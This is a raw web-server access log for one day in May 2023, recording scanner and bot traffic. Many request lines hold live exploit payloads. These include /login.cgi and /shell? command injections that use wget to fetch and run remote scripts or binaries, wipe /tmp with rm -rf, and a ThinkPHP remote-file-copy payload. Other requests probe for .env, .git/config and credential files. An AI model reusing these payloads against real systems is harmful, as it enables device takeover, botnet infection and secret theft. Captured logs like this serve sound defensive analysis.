104.140.148.118 - - [27/May/2023:02:27:16 +0200] "\x16\x03\x01" 400 383 "-" "-" 104.140.148.122 - - [27/May/2023:02:48:28 +0200] "GET /supp/notifications.php HTTP/1.1" 404 292 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7" 31.220.1.83 - - [27/May/2023:03:26:12 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 94.158.244.32 - - [27/May/2023:03:52:36 +0200] "GET / HTTP/1.1" 200 274 "-" "Linux Gnu (cow)" 212.47.245.230 - - [27/May/2023:04:29:02 +0200] "GET /robots.txt HTTP/1.1" 404 366 "-" "Mozilla/5.0 (compatible; SeekportBot; +https://bot.seekport.com)" 212.47.245.230 - - [27/May/2023:04:29:02 +0200] "GET /robots.txt HTTP/1.1" 404 366 "-" "Mozilla/5.0 (compatible; SeekportBot; +https://bot.seekport.com)" 212.47.245.230 - - [27/May/2023:04:29:02 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (compatible; SeekportBot; +https://bot.seekport.com)" 109.205.213.4 - - [27/May/2023:04:32:39 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "r00ts3c-owned-you" 175.144.101.40 - - [27/May/2023:04:42:52 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://192.210.162.147/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1" 400 296 "-" "r00ts3c-owned-you" 109.205.213.10 - - [27/May/2023:04:44:36 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "r00ts3c-owned-you" 194.180.48.85 - - [27/May/2023:05:03:12 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 293 "http://212.69.160.11:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0" 104.140.148.46 - - [27/May/2023:05:32:21 +0200] "\x16\x03\x01" 400 383 "-" "-" 194.165.16.78 - - [27/May/2023:05:42:33 +0200] "\x03" 400 383 "-" "-" 45.79.181.223 - - [27/May/2023:05:49:08 +0200] "\x16\x03\x01" 400 383 "-" "-" 45.131.177.46 - - [27/May/2023:06:34:13 +0200] "GET /?s=/admin/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=copy&vars%5B1%5D%5B%5D=http://162.209.198.154/runtime/temp/2.txt&vars%5B1%5D%5B%5D=system.php HTTP/1.1" 200 274 "-" "python-requests/2.28.2" 45.131.177.46 - - [27/May/2023:06:34:13 +0200] "GET /system.php HTTP/1.1" 404 290 "-" "python-requests/2.28.2" 59.25.186.110 - - [27/May/2023:06:44:21 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://192.210.162.147/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1" 400 296 "-" "r00ts3c-owned-you" 52.167.144.80 - - [27/May/2023:07:03:21 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36" 185.170.144.3 - - [27/May/2023:07:14:55 +0200] "\x03" 400 383 "-" "-" 87.236.176.165 - - [27/May/2023:07:22:59 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)" 87.236.176.251 - - [27/May/2023:07:23:02 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)" 179.43.177.244 - - [27/May/2023:07:33:27 +0200] "GET / HTTP/1.1" 200 423 "-" "Hello World" 84.252.92.13 - - [27/May/2023:07:37:05 +0200] "GET /~ridersde/joomla/index.php?option=com_xijc&view=captcha HTTP/1.0" 404 309 "https://www.google.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:69.0) Gecko/20100101 Firefox/69.0" 128.1.248.42 - - [27/May/2023:07:46:32 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 45.128.232.62 - - [27/May/2023:07:51:39 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 293 "http://212.69.160.11:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0" 95.214.27.80 - - [27/May/2023:07:55:03 +0200] "GET /.git/config HTTP/1.1" 404 285 "-" "python-requests/2.28.1" 103.110.32.156 - - [27/May/2023:08:36:34 +0200] "GET / HTTP/1.1" 200 274 "-" "Linux Gnu (cow)" 64.227.172.170 - - [27/May/2023:08:40:20 +0200] "\x16\x03\x01" 400 383 "-" "-" 64.227.172.170 - - [27/May/2023:08:40:21 +0200] "\x16\x03\x01" 400 383 "-" "-" 64.227.172.170 - - [27/May/2023:08:40:21 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 64.227.172.170 - - [27/May/2023:08:40:21 +0200] "GET /client/get_targets HTTP/1.1" 404 289 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 64.227.172.170 - - [27/May/2023:08:40:22 +0200] "GET /upl.php HTTP/1.1" 404 282 "-" "Mozilla/5.0" 64.227.172.170 - - [27/May/2023:08:40:22 +0200] "\x16\x03\x01" 400 383 "-" "-" 64.227.172.170 - - [27/May/2023:08:40:22 +0200] "GET /geoip/ HTTP/1.1" 404 281 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 64.227.172.170 - - [27/May/2023:08:40:23 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Mobile/15E148 Snapchat/10.77.0.54 (like Safari/604.1)" 64.227.172.170 - - [27/May/2023:08:40:23 +0200] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 64.227.172.170 - - [27/May/2023:08:40:23 +0200] "GET /1.php HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 64.227.172.170 - - [27/May/2023:08:40:24 +0200] "GET /bundle.js HTTP/1.1" 404 283 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 179.43.177.244 - - [27/May/2023:09:07:03 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 293 "http://212.69.160.11:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0" 62.233.50.179 - - [27/May/2023:09:07:12 +0200] "\x03" 400 383 "-" "-" 3.110.149.171 - - [27/May/2023:09:14:47 +0200] "GET /index.php HTTP/1.1" 200 274 "-" "Mozilla/5.0 zgrab/0.x" 168.232.12.206 - - [27/May/2023:09:15:12 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 13.211.191.249 - - [27/May/2023:09:44:05 +0200] "GET /credentials.json HTTP/1.1" 404 288 "-" "Mozilla/5.0 zgrab/0.x" 3.87.23.245 - - [27/May/2023:09:56:22 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 6.2;en-US) AppleWebKit/537.32.36 (KHTML, live Gecko) Chrome/58.0.3110.73 Safari/537.32" 109.237.97.180 - - [27/May/2023:10:01:24 +0200] "\x16\x03\x01\x01H\x01" 400 383 "-" "-" 109.237.97.180 - - [27/May/2023:10:01:25 +0200] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 109.205.213.38 - - [27/May/2023:10:06:50 +0200] "POST /GponForm/diag_Form?images/ HTTP/1.1" 400 296 "-" "Hello, World" 183.136.225.32 - - [27/May/2023:10:06:54 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" 109.205.213.107 - - [27/May/2023:10:15:02 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "r00ts3c-owned-you" 183.136.225.32 - - [27/May/2023:10:16:45 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE" 183.136.225.32 - - [27/May/2023:10:16:45 +0200] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE" 203.123.41.214 - - [27/May/2023:10:17:42 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://192.210.162.147/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1" 400 296 "-" "r00ts3c-owned-you" 4.184.57.28 - - [27/May/2023:10:51:03 +0200] "GET / HTTP/1.1" 200 274 "-" "Python/3.10 aiohttp/3.8.3" 109.205.213.41 - - [27/May/2023:10:54:15 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "r00ts3c-owned-you" 84.239.14.188 - - [27/May/2023:10:59:46 +0200] "GET / HTTP/1.1" 200 423 "http://212.69.160.11:80/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4896.127 Safari/537.36" 109.205.213.39 - - [27/May/2023:11:00:13 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "r00ts3c-owned-you" 139.162.239.80 - - [27/May/2023:11:21:15 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0" 139.162.239.80 - - [27/May/2023:11:21:15 +0200] "\x16\x03\x01" 400 383 "-" "-" 139.162.239.80 - - [27/May/2023:11:21:15 +0200] "\x16\x03\x01" 400 383 "-" "-" 139.162.239.80 - - [27/May/2023:11:21:15 +0200] "\x16\x03\x01" 400 383 "-" "-" 128.14.134.170 - - [27/May/2023:11:35:37 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 59.25.186.110 - - [27/May/2023:11:58:34 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://192.210.162.147/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1" 400 296 "-" "r00ts3c-owned-you" 74.208.210.100 - - [27/May/2023:12:13:00 +0200] "GET /.env HTTP/1.1" 404 349 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0" 74.208.210.100 - - [27/May/2023:12:13:00 +0200] "GET /wp-content/ HTTP/1.1" 404 356 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0" 109.205.213.14 - - [27/May/2023:12:24:11 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "r00ts3c-owned-you" 15.204.52.61 - - [27/May/2023:12:34:51 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0" 193.19.109.66 - - [27/May/2023:12:49:09 +0200] "GET / HTTP/1.0" 200 423 "http://food-and-drink.vienna-lodgings.at/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36" 198.235.24.43 - - [27/May/2023:13:38:02 +0200] "\x16\x03\x01" 400 383 "-" "-" 45.128.232.139 - - [27/May/2023:13:47:44 +0200] "CONNECT google.com:443 HTTP/1.1" 200 423 "-" "Go-http-client/1.1" 34.140.248.32 - - [27/May/2023:13:47:55 +0200] "GET / HTTP/1.1" 200 274 "-" "python-requests/2.28.2" 35.203.211.12 - - [27/May/2023:14:00:38 +0200] "GET / HTTP/1.1" 200 423 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 37.120.221.94 - - [27/May/2023:14:08:02 +0200] "GET /~ridersde/joomla/index.php?option=com_xijc&view=captcha HTTP/1.0" 404 309 "https://www.google.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:82.0) Gecko/20100101 Firefox/82.0" 87.236.176.7 - - [27/May/2023:14:09:27 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)" 87.236.176.94 - - [27/May/2023:14:09:28 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)" 14.53.55.118 - - [27/May/2023:14:14:01 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://192.210.162.147/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1" 400 296 "-" "r00ts3c-owned-you" 34.78.6.216 - - [27/May/2023:14:22:15 +0200] "GET / HTTP/1.1" 200 274 "-" "python-requests/2.28.2" 59.24.112.25 - - [27/May/2023:14:31:42 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://192.210.162.147/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1" 400 296 "-" "r00ts3c-owned-you" 101.68.211.2 - - [27/May/2023:14:39:20 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" 101.68.211.2 - - [27/May/2023:14:41:41 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE" 101.68.211.2 - - [27/May/2023:14:41:43 +0200] "GET /robots.txt HTTP/1.1" 404 292 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE" 88.247.28.65 - - [27/May/2023:14:47:15 +0200] "POST /HNAP1/ HTTP/1.0" 400 373 "-" "-" 205.210.31.184 - - [27/May/2023:15:03:30 +0200] "GET / HTTP/1.1" 200 423 "-" "-" 67.205.191.23 - - [27/May/2023:15:38:43 +0200] "HEAD / HTTP/1.1" 200 - "https://www.bing.com" "Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36" 67.205.191.23 - - [27/May/2023:15:38:44 +0200] "GET /wp-login.php HTTP/1.1" 404 294 "http://smtpo.financetrainer.com" "Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36" 67.205.191.23 - - [27/May/2023:15:38:46 +0200] "GET /wordpress/wp-login.php HTTP/1.1" 404 300 "http://smtpo.financetrainer.com" "Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36" 67.205.191.23 - - [27/May/2023:15:38:46 +0200] "GET /blog/wp-login.php HTTP/1.1" 404 297 "http://smtpo.financetrainer.com" "Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36" 67.205.191.23 - - [27/May/2023:15:38:46 +0200] "GET /wp/wp-login.php HTTP/1.1" 404 295 "http://smtpo.financetrainer.com" "Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36" 14.29.229.15 - - [27/May/2023:15:48:44 +0200] "GET /wp-login.php HTTP/1.1" 404 299 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_161)" 14.29.229.15 - - [27/May/2023:15:48:44 +0200] "GET /?author=1 HTTP/1.1" 200 274 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_161)" 14.29.229.15 - - [27/May/2023:15:48:45 +0200] "GET /?author=2 HTTP/1.1" 200 274 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_161)" 14.29.229.15 - - [27/May/2023:15:48:46 +0200] "GET /?author=3 HTTP/1.1" 200 274 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_161)" 14.29.229.15 - - [27/May/2023:15:48:47 +0200] "GET /?author=4 HTTP/1.1" 200 274 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_161)" 14.29.229.15 - - [27/May/2023:15:48:47 +0200] "GET /?author=5 HTTP/1.1" 200 274 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_161)" 14.29.229.15 - - [27/May/2023:15:48:50 +0200] "GET /?author=6 HTTP/1.1" 200 274 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_161)" 14.29.229.15 - - [27/May/2023:15:48:50 +0200] "GET /?author=7 HTTP/1.1" 200 274 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_161)" 14.29.229.15 - - [27/May/2023:15:48:51 +0200] "GET /?author=8 HTTP/1.1" 200 274 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_161)" 14.29.229.15 - - [27/May/2023:15:48:51 +0200] "GET /?author=9 HTTP/1.1" 200 274 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_161)" 14.29.229.15 - - [27/May/2023:15:48:52 +0200] "GET /?author=10 HTTP/1.1" 200 274 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_161)" 14.29.229.15 - - [27/May/2023:15:48:52 +0200] "GET /?author=11 HTTP/1.1" 200 274 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_161)" 14.29.229.15 - - [27/May/2023:15:48:53 +0200] "GET /?author=12 HTTP/1.1" 200 274 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_161)" 14.29.229.15 - - [27/May/2023:15:48:53 +0200] "GET /?author=13 HTTP/1.1" 200 274 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_161)" 14.29.229.15 - - [27/May/2023:15:48:54 +0200] "GET /?author=14 HTTP/1.1" 200 274 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_161)" 14.29.229.15 - - [27/May/2023:15:48:54 +0200] "GET /?author=15 HTTP/1.1" 200 274 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_161)" 14.29.229.15 - - [27/May/2023:15:48:54 +0200] "GET /?author=16 HTTP/1.1" 200 274 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_161)" 14.29.229.15 - - [27/May/2023:15:48:55 +0200] "GET /?author=17 HTTP/1.1" 200 274 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_161)" 14.29.229.15 - - [27/May/2023:15:48:55 +0200] "GET /?author=18 HTTP/1.1" 200 274 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_161)" 14.29.229.15 - - [27/May/2023:15:48:56 +0200] "GET /?author=19 HTTP/1.1" 200 274 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_161)" 14.29.229.15 - - [27/May/2023:15:48:56 +0200] "GET /?author=20 HTTP/1.1" 200 274 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_161)" 64.62.197.97 - - [27/May/2023:15:50:42 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" 64.62.197.99 - - [27/May/2023:15:53:41 +0200] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0" 64.62.197.92 - - [27/May/2023:15:55:13 +0200] "GET /geoserver/web/ HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" 141.98.11.41 - - [27/May/2023:17:37:07 +0200] "GET / HTTP/1.1" 200 423 "-" "-" 109.205.213.43 - - [27/May/2023:17:40:11 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "r00ts3c-owned-you" 104.140.148.46 - - [27/May/2023:18:09:33 +0200] "GET /server-status HTTP/1.1" 403 286 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_7; en-us) AppleWebKit/534.20.8 (KHTML, like Gecko) Version/5.1 Safari/534.20.8" 185.253.162.13 - - [27/May/2023:18:11:47 +0200] "GET /~ridersde/joomla/index.php?option=com_xijc&view=captcha HTTP/1.0" 404 309 "https://www.google.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:81.0) Gecko/20100101 Firefox/81.0" 104.140.148.62 - - [27/May/2023:18:45:45 +0200] "\x16\x03\x01" 400 383 "-" "-" 223.13.123.185 - - [27/May/2023:19:42:40 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+94.158.247.123/jaws;sh+/tmp/jaws HTTP/1.1" 404 346 "-" "Hello, world" 162.243.144.24 - - [27/May/2023:19:51:26 +0200] "MGLNDD_212.69.160.11_80" 400 383 "-" "-" 109.205.213.10 - - [27/May/2023:19:53:05 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "r00ts3c-owned-you" 222.117.246.19 - - [27/May/2023:19:56:10 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://192.210.162.147/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1" 400 296 "-" "r00ts3c-owned-you" 107.170.230.6 - - [27/May/2023:19:57:38 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 zgrab/0.x" 216.158.250.235 - - [27/May/2023:20:38:35 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://192.210.162.147/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1" 400 296 "-" "r00ts3c-owned-you" 47.87.147.173 - - [27/May/2023:20:59:49 +0200] "GET / HTTP/1.1" 200 423 "-" "Hello World" 165.231.182.25 - - [27/May/2023:21:03:32 +0200] "GET /~ridersde/joomla/index.php?option=com_xijc&view=captcha HTTP/1.0" 404 309 "https://www.google.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:66.0) Gecko/20100101 Firefox/66.0" 58.18.38.131 - - [27/May/2023:21:06:45 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+94.158.247.123/jaws;sh+/tmp/jaws HTTP/1.1" 404 346 "-" "Hello, world" 116.131.53.98 - - [27/May/2023:21:06:47 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+94.158.247.123/jaws;sh+/tmp/jaws HTTP/1.1" 404 346 "-" "Hello, world" 120.237.206.76 - - [27/May/2023:21:06:48 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+94.158.247.123/jaws;sh+/tmp/jaws HTTP/1.1" 404 346 "-" "Hello, world" 131.100.51.254 - - [27/May/2023:22:06:56 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 104.140.148.46 - - [27/May/2023:22:08:14 +0200] "GET /supp/msroot/api.php?action=info&ajax=true HTTP/1.1" 404 289 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36" 14.53.55.118 - - [27/May/2023:22:09:48 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://192.210.162.147/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1" 400 296 "-" "r00ts3c-owned-you" 120.79.225.204 - - [27/May/2023:22:13:51 +0200] "HEAD / HTTP/1.1" 200 - "https://www.bing.com" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36" 120.79.225.204 - - [27/May/2023:22:13:54 +0200] "GET /wp-login.php HTTP/1.1" 404 297 "http://coffeenostra.castlegem.co.uk" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36" 120.79.225.204 - - [27/May/2023:22:13:54 +0200] "GET /wordpress/wp-login.php HTTP/1.1" 404 303 "http://coffeenostra.castlegem.co.uk" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36" 120.79.225.204 - - [27/May/2023:22:13:56 +0200] "GET /blog/wp-login.php HTTP/1.1" 404 300 "http://coffeenostra.castlegem.co.uk" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36" 120.79.225.204 - - [27/May/2023:22:13:56 +0200] "GET /wp/wp-login.php HTTP/1.1" 404 299 "http://coffeenostra.castlegem.co.uk" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36" 13.82.81.116 - - [27/May/2023:22:16:11 +0200] "GET /wp-content/plugins/wp-daft/t62.php HTTP/1.1" 404 313 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 109.205.213.14 - - [27/May/2023:22:33:48 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "r00ts3c-owned-you" 103.110.32.156 - - [27/May/2023:22:43:41 +0200] "GET / HTTP/1.1" 200 274 "-" "Linux Gnu (cow)" 50.21.182.102 - - [27/May/2023:22:51:52 +0200] "GET /.env HTTP/1.1" 404 349 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0" 50.21.182.102 - - [27/May/2023:22:51:52 +0200] "GET /wp-content/ HTTP/1.1" 404 356 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0" 179.43.177.244 - - [27/May/2023:23:00:49 +0200] "GET / HTTP/1.1" 200 423 "-" "Hello World" 159.65.111.248 - - [27/May/2023:23:18:43 +0200] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:98.0) Gecko/20100101 Firefox/98.0" 121.123.94.206 - - [27/May/2023:23:47:33 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 47.87.131.126/bins/oryx.arm4;chmod+777+/tmp/oryx.arm4;sh+/tmp/oryx.arm4" 400 383 "-" "-" 205.210.31.48 - - [27/May/2023:23:51:41 +0200] "GET / HTTP/1.1" 200 423 "-" "-" 93.124.123.174 - - [28/May/2023:00:02:14 +0200] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) 